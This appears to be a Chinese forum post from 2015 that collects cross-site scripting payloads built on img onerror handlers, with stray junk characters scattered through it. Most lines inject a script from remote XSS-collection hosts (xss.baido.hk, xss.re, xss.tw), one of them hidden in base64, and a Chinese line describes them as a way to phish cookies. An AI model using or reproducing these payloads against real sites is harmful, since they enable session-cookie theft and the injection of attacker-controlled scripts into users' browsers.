<img src='non-exist.jpg'onerror="alert('xss')">: v, g' s- G* e7 r
<img src=# onerror=alert(123)>3 y2 k! O- y- u6 l" h! i; f2 ]/ q
<img src=# onerror=alert(document.cookie)>
( q# d9 G) D- O' V下面是利用平台钓cookie的& z s3 e- d, n. u& F1 d
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
3 n/ T& Y0 K/ f( T
' t7 e- g9 e; p$ h* O, }- ^( U
+ O; E& @1 ^+ y r1 P<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>" p0 `; i& r7 b3 F, W# a
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
4 e4 ^; I9 _! i/ H( v“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
( [9 Q8 \& K E: Q<img src=1 onerror=jQuery.getScript("//xss.re/974")> 2 \* W1 Y5 N$ h7 J9 }2 W3 J) w
<img src="#">+ N4 J6 B/ d8 @! L- u
<img src="#">
$ X# D6 b6 U8 u<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>6 c& M. _# U* E
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
" N# j) Z! F; Q* G1 _% x<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
% ]0 V5 M( v! k, {- [8 `* ]6 ^3 c<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>( u: u& |' C0 T8 d, \0 H) X" O
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>7 ^& V# e. v1 t! X$ K& \
<img src=x width="0" height="0"></img>. W2 _1 k$ e! D+ j6 g0 J8 d
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
: N. R! o6 g/ p* d& U7 E<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>& C7 T! G% R P# s4 R$ X7 G
|
发表于 2015-10-18 14:33:54
收藏
支持
反对